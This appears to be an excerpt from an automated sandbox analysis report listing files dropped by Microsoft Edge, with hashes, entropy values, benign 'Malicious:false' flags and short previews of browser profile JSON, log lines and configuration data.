                                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                            Entropy (8bit):5.567883867304443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7sSWPMOfKd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwDbpttuH:MhD7sSWPMOfKdu1jaCrnLDntA
                                                                                                                                                                            MD5:C0C4E0A053D200A0666279081CE6D109
                                                                                                                                                                            SHA1:03F5A6591FC16A5EB3893A2411427B4FA43A254C
                                                                                                                                                                            SHA-256:67BEBB8805E8C681BE818BB528218113F63624340704878EB0AAA8CB8F6C10EB
                                                                                                                                                                            SHA-512:BFF948B2C85717CFB8AFAD370296535F4F5A583E7B0D1D6A15785F28701D13240FD0301EFF65857B936B5623F341C9576109647C3A5CC49DAA1ABC25F59CB99C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28367
                                                                                                                                                                            Entropy (8bit):5.558246678265002
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7b37pLGLPLSWPMOf1d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwSbpttuP:MhD7bxcPLSWPMOf1du1jaCrnLSntk
                                                                                                                                                                            MD5:349C7119A0FB6776BE3828093ABC26BD
                                                                                                                                                                            SHA1:CFCD0001073582A2C80E5D0CC2DAC7200D79AD2B
                                                                                                                                                                            SHA-256:334FB01CC6D061F198BDF21276686158DD078C7923C4DEC53ECFD036C5830018
                                                                                                                                                                            SHA-512:C8B83377FD59FC47D1DC7EE579D641F359C280920AC982C0B68C94361B3D0E6082EAE6E6005E77959E0D6A242E22C56073FC3687C1F0A9C17A6AAF6F93FB89A7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.04936279064293761
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:Gd0JAmu8jH0JAmu8jL9XCChslotGLNl0ml/XoQDeX:zJXsJXxpEjVl/XoQ
                                                                                                                                                                            MD5:5D0C04F0027C10D96C0F276FD4A780EE
                                                                                                                                                                            SHA1:A62A3492B8C288E37F84959DBA4F0DCC4558DE90
                                                                                                                                                                            SHA-256:0A027CAECA735B56DE709403BD4EFDAAFFC1DB195F2E32E885FC373C19DC0772
                                                                                                                                                                            SHA-512:52749897993A5AFE9012208ACCCFD30F02E343C9AB33F8C4E49417AA01C66939D0F19A328921C644892C67C7494C05DD7568C43AC526826044F69606B5DB9529
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2020
                                                                                                                                                                            Entropy (8bit):5.32166849590672
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:iDG8xSBSeQdPQHRHWxkIYjIYGzmqkDMYjMY+qylAlkfAlkr3Ei:ak0eQKIYjIYGzmbDMYjMYyYcY+3Ei
                                                                                                                                                                            MD5:090A8CF78F6419220D8FCC9A2973F6B6
                                                                                                                                                                            SHA1:58D8F200CFD847ECF3E5AA577DF5862012393AF7
                                                                                                                                                                            SHA-256:4A06B6E504C7B134893C11C711789C78CBACDF17E4567340950A41E110638F19
                                                                                                                                                                            SHA-512:45AD881B2ECCA1E22D2C33FA95946AA119209289A7EFBE15EA06F2B08E4CAA49897DB698B5225BBE3D6BDBE96B58F3D0C54E2A0FDB3C21F270CAA739BBA1C742
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=....................................4_IPH_CompanionSidePanel...IPH_CompanionSidePanel....$4_IPH_CompanionSidePanelRegionSearch(."IPH_CompanionSidePanelRegionSearch.....4_IPH_DownloadToolbarButton...IPH_DownloadToolbarButton....&4_IPH_FocusHelpBubbleScreenReaderPromo*.$IPH_FocusHelpBubbleScreenReaderPromo.....4_IPH_GMCCastStartStop...IPH_GMCCastStartStop.....4_IPH_HighEfficiencyMode...IPH_HighEfficiencyMode.....4_IPH_LiveCaption...IPH_LiveCaption.....4_IPH_PasswordsAccountStorage!..IPH_Pa
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                            Entropy (8bit):5.244469287252946
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7qi3+q2P923oH+TcwtfrK+IFUt8OqY5Zmw+Oqt9VkwO923oH+TcwtfrUeLJ:7qPv4Yeb23FUt8OqY5/+Oql5LYeb3J
                                                                                                                                                                            MD5:190417A3CB0839D5944B37FCF11F7D2F
                                                                                                                                                                            SHA1:E47B10A6DBFD66C1F8B6B88C673B2D803FC9600F
                                                                                                                                                                            SHA-256:8F842D2C4D7B77D6186FA60C9BC11E236EB12500BE8FB63C86AFEE831A3A9AB4
                                                                                                                                                                            SHA-512:31317C669285136B916D98876E8A24E3E9FA91760F7E2F79D90A781C353011DA9AF485A01533F8D2CC5D52B7F03B667E434646B176B19BA44CE31CB58C7D7F66
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.463 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/11-03:39:39.465 938 Recovering log #3.2024/12/11-03:39:39.466 938 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                            Entropy (8bit):4.089449943493988
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:G0nYUtypD3RUovhC+lvBOL+t3IvB8f12/6:LYUtyp1vxdBllIp8f0i
                                                                                                                                                                            MD5:A4FF1AD5DDD86E2FFEC54C60EA640FF0
                                                                                                                                                                            SHA1:89C5183277541E50B3760CB1CF96E51D8763C619
                                                                                                                                                                            SHA-256:6566C59DB938C176645FC47EE7A229FE0A679DA8185265FDAFC176DC69F6CD64
                                                                                                                                                                            SHA-512:7018BDEE309E9AA38094F25DA4DD0063AE3C61B6CBF85BCDCA837F0B255DAF88560A76535B91F4FBC6799AF91C2D041E8F6F777D6B65B77E3CB230DE1051E0A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ....P.................3_......C...................4_.......:S.................3_.....!sN..................4_.....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):339
                                                                                                                                                                            Entropy (8bit):5.185567300183782
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7ue+q2P923oH+TcwtfrzAdIFUt8OujXJZmw+OujX9VkwO923oH+TcwtfrzILJ:7uPv4Yeb9FUt8Ou9/+OuP5LYeb2J
                                                                                                                                                                            MD5:FF29063BE197BBFD9C80AF0C960E649E
                                                                                                                                                                            SHA1:0A5969740B4BAF84860AB982F8FE4BB8A310D00D
                                                                                                                                                                            SHA-256:014396CD91BBF8A76FDB4835E3E54E3BE366A63E26CB69883A70A83688DDFE32
                                                                                                                                                                            SHA-512:EAFF6EB26586E15EE713A1D3F54C412ABE662596CD67CD04F551C365BA9BBB6F36D580E7E054BCC13DCE8821E130E8F3F1C757CE6A3D2F0557CC80C4BD9D95AC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.423 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/11-03:39:39.424 938 Recovering log #3.2024/12/11-03:39:39.424 938 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):398313
                                                                                                                                                                            Entropy (8bit):4.953803318132309
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:veqeoyyQJztYNr3CZsTKsvbbOPlMa0JJoG3JfeX5B7FxRG0MZ/d18bfpyvFaRnxY:q7JVZb0JOGiMldObbFG/eFd2X134a
                                                                                                                                                                            MD5:4529A95302CDD7EF2BB39E087A5E8DF6
                                                                                                                                                                            SHA1:6449A1AAEF5A5BBF798FF0FFF1BB51F5150FD578
                                                                                                                                                                            SHA-256:A41F5D82CF139CB1C29E91EE45A873B98879971E5E5552CC3B903EB8FE1CF658
                                                                                                                                                                            SHA-512:B314C5434D903E0472C7A1E02E958DE7DC68C7FE44CAC3486B98C48BB057E6263EC6EF00A1CCC186FC6CD3240EC2D62C73D091975B669ACE7D978AB65A670318
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{. "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}",. "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}",. "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",. "2cvresearch.decipherinc.com": "{\"Tier1\": [8405], \"Tier2\": [379, 6101]}",. "3817341.extforms.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [7746]}",. "3cx.integrafin.co.uk": "{\"Tier1\": [8405, 6061], \"Tier2\": [2863, 5391]}",. "4540582.extforms.netsuite.com": "{\"Tier1\": [8405], \"Tier2\": [228, 236, 7746]}",. "7589.directpaper.name": "{\"Tier1\": [8405], \"Tier2\": []}",. "7a201srvitportl.cymru.nhs.uk": "{\"Tier1\": [], \"Tier2\": [9870]}",. "7a3cjsvmifitla1.cymru.nhs.uk": "{\"Tier1\": [6061], \"Tier2\": [1092]}",. "7a3cjsvmlivwebb.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": [9870, 9813]}",. "8ballpool.com": "{\"Tier1\": [8741, 3907, 983], \"Tier2\": [9151, 5779, 6916]}",. "9anime.gs"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                            Entropy (8bit):3.32524464792714
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                            Entropy (8bit):2.7192945256669794
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                            MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                            SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                            SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                            SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:117.0.2045.47
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                             Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2036497
                                                                                                                                                                            Entropy (8bit):4.001538040150106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:xJr7WfjZRD6FFiWnUO5bdgUS4AueTVd0KdKn46Ww5vQvhZ8pkyBjJuIgwYKaZaDV:1
                                                                                                                                                                            MD5:56EDC69AC1FB214065C8B27ACB5BF313
                                                                                                                                                                            SHA1:0FC88D6A2FF6DBAA12BCF1C56C6DA6DBC7D32F87
                                                                                                                                                                            SHA-256:E92460AB2F9ADE0417B1C8DC113B84FA9A4F6DA9F48D4AC252FC7000F5DAD8F4
                                                                                                                                                                            SHA-512:A48D683967E10E82E92C3CA7A565188443DAA8F2FC85C196B77B786BCB2A39177DF053884E466D66F9A6BBEE0917AD1291A8715806F45B8D461F345C0DD37681
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):86
                                                                                                                                                                            Entropy (8bit):4.3751917412896075
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                            MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                            SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                            SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                            SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44911
                                                                                                                                                                            Entropy (8bit):6.086423896790647
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dPSdFuUhDO6vP6Oe7t/zuhvsR3XDgh1+wbCAoTGoup1Xl3jVzXb:OMk1rT8H1qc6it/zVkh8wbRoThu3VlXb
                                                                                                                                                                            MD5:56F9967A2BC47E4D02F96269D8982E39
                                                                                                                                                                            SHA1:957B33A3A858A4DB1BCE7F2896FE95C268054E28
                                                                                                                                                                            SHA-256:1F792448FEA652A1581BDBE153C6493B2C7394B243867EC5B11A59B492BD8DC2
